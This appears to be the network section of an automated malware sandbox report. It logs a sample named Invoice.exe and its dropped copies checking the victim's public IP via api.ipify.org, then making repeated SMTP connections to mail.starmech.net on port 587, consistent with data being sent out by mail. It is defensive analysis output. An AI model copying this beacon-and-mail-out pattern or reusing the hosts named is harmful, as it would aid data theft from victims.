Apr 26, 2024 11:45:51.626998901 CEST	49766	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:51.834837914 CEST	587	49766	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:51.835289955 CEST	49766	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:51.836007118 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:52.043545961 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:52.043777943 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:52.345148087 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:52.345470905 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:52.553441048 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:52.553627014 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:52.762223959 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:52.762835979 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:52.977696896 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:52.977722883 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:52.977780104 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:52.977824926 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:52.979912043 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:53.187741041 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:53.190187931 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:53.398042917 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:53.398287058 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:53.606352091 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:53.606627941 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:53.824008942 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:53.824203968 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.031943083 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.037214994 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.275780916 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.276124001 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.483757973 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.484090090 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.484138966 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.484138966 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.484261990 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.486567020 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.691662073 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.691756964 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.691793919 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.691811085 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.691888094 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.694504023 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.694555998 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.694593906 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.694626093 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.694715977 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.694783926 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.735151052 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.735682011 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.899663925 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.899750948 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.902467012 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.902530909 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.902757883 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.902818918 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.902928114 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.902997971 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.903053999 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.903119087 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.903129101 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.903187037 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.903302908 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.903384924 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.903413057 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.903474092 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.903721094 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.903788090 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:54.943542004 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:54.943599939 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:55.107722998 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.107800961 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:55.107937098 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.108007908 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:55.110372066 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.110459089 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:55.110522032 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.110619068 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.110805988 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:55.110829115 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.110846996 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:55.111150980 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.111185074 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.111249924 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.111336946 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.111771107 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.111803055 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.111834049 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.111906052 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.111948967 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.112013102 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.112065077 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.112097025 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.112166882 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.112225056 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.112257004 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.112310886 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.112341881 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.112442970 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.112502098 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.151228905 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.151283979 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.151299953 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.151349068 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.321516037 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.321558952 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.321793079 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.321902037 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.321949959 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.321981907 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.322031021 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.322065115 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.325433016 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.325463057 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.325495005 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.325526953 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.325620890 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.325653076 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.327963114 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:55.388921976 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:19.701710939 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:19.701937914 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:19.911781073 CEST	587	49770	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:19.912072897 CEST	49770	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:19.912406921 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:19.912492037 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:20.200963020 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:20.201078892 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:20.408931017 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:20.409055948 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:20.617633104 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:20.617961884 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:20.832794905 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:20.832828999 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:20.832848072 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:20.832869053 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:20.834151030 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.042093992 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.043277025 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.268625021 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.268820047 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.311995983 CEST	49772	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.477174044 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.477380991 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.519419909 CEST	587	49772	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.519514084 CEST	49772	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.588149071 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.725199938 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.777299881 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.777451992 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.778254986 CEST	587	49772	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.778376102 CEST	49772	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.795811892 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.796111107 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.796319962 CEST	49773	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.985070944 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.985148907 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.985841036 CEST	587	49772	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:21.986056089 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:21.986093998 CEST	49772	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.003552914 CEST	587	49773	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.007045984 CEST	49773	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.195461035 CEST	587	49772	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.199367046 CEST	49772	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.223618031 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.227150917 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.285024881 CEST	587	49773	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.285708904 CEST	49773	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.418703079 CEST	587	49772	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.418766022 CEST	587	49772	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.418807983 CEST	587	49772	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.419112921 CEST	49772	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.420248032 CEST	49772	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.434814930 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.435090065 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.435163975 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.435267925 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.435297966 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.436470985 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.493719101 CEST	587	49773	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.494149923 CEST	49773	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.627923012 CEST	587	49772	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.629899025 CEST	49772	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.642759085 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.642791033 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.642930984 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.642951965 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.643017054 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.644247055 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.644284964 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.644435883 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.644541025 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.644561052 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.644618034 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.685245991 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.685336113 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.703494072 CEST	587	49773	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.703821898 CEST	49773	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.837318897 CEST	587	49772	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.838594913 CEST	49772	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.850883961 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.851058006 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.852396011 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.852473974 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.852658987 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.852674961 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.852788925 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.852916956 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.852941990 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.853054047 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.853056908 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.853115082 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.893052101 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.893373013 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.918571949 CEST	587	49773	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.918713093 CEST	587	49773	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.918732882 CEST	587	49773	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.918800116 CEST	49773	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.920030117 CEST	49773	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:22.943140984 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:22.943209887 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:23.046282053 CEST	587	49772	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.058919907 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.058938026 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.059012890 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:23.060210943 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.060281038 CEST	49771	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:23.060401917 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.060679913 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.060910940 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.060981035 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.061096907 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.061197996 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.061333895 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.061378002 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.061391115 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.061882019 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.061897039 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.062172890 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.062226057 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.062263012 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.062278032 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.062407970 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.062532902 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.062602997 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.062650919 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.062664986 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.092094898 CEST	49772	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:23.101149082 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.101176977 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.101191998 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.101259947 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.127636909 CEST	587	49773	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.151037931 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.170120955 CEST	49773	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:46:23.266767979 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.266809940 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.266828060 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.266937017 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.266987085 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.267002106 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.267015934 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.267067909 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.267872095 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.267896891 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.267942905 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.267971992 CEST	587	49771	207.174.215.249	192.168.2.4
Apr 26, 2024 11:46:23.268027067 CEST	587	49771	207.174.215.249	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 11:42:10.634848118 CEST	61125	53	192.168.2.4	1.1.1.1
Apr 26, 2024 11:42:10.759743929 CEST	53	61125	1.1.1.1	192.168.2.4
Apr 26, 2024 11:42:12.315946102 CEST	54151	53	192.168.2.4	1.1.1.1
Apr 26, 2024 11:42:12.615077972 CEST	53	54151	1.1.1.1	192.168.2.4
Apr 26, 2024 11:42:32.801153898 CEST	62918	53	192.168.2.4	1.1.1.1
Apr 26, 2024 11:42:32.926634073 CEST	53	62918	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 11:42:10.634848118 CEST	192.168.2.4	1.1.1.1	0x7d30	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:42:12.315946102 CEST	192.168.2.4	1.1.1.1	0xf58f	Standard query (0)	mail.starmech.net	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:42:32.801153898 CEST	192.168.2.4	1.1.1.1	0xcce6	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 11:42:10.759743929 CEST	1.1.1.1	192.168.2.4	0x7d30	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:42:10.759743929 CEST	1.1.1.1	192.168.2.4	0x7d30	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:42:10.759743929 CEST	1.1.1.1	192.168.2.4	0x7d30	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:42:12.615077972 CEST	1.1.1.1	192.168.2.4	0xf58f	No error (0)	mail.starmech.net	207.174.215.249	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:42:32.926634073 CEST	1.1.1.1	192.168.2.4	0xcce6	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:42:32.926634073 CEST	1.1.1.1	192.168.2.4	0xcce6	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Apr 26, 2024 11:42:32.926634073 CEST	1.1.1.1	192.168.2.4	0xcce6	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	104.26.12.205	443	7396	C:\Users\user\Desktop\Invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:42:11 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-26 09:42:11 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 09:42:11 GMT Content-Type: text/plain Content-Length: 15 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 87a59f114dc2a4eb-MIA
2024-04-26 09:42:11 UTC	15	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 Data Ascii: 102.129.152.220

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.26.12.205	443	7788	C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:42:14 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-26 09:42:15 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 09:42:15 GMT Content-Type: text/plain Content-Length: 15 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 87a59f27fae074ae-MIA
2024-04-26 09:42:15 UTC	15	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 Data Ascii: 102.129.152.220

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	104.26.12.205	443	8148	C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:42:25 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-26 09:42:25 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 09:42:25 GMT Content-Type: text/plain Content-Length: 15 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 87a59f689a1c0349-MIA
2024-04-26 09:42:25 UTC	15	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 Data Ascii: 102.129.152.220

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49747	104.26.13.205	443	6356	C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:42:33 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-26 09:42:33 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 09:42:33 GMT Content-Type: text/plain Content-Length: 15 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 87a59f9adbf831d8-MIA
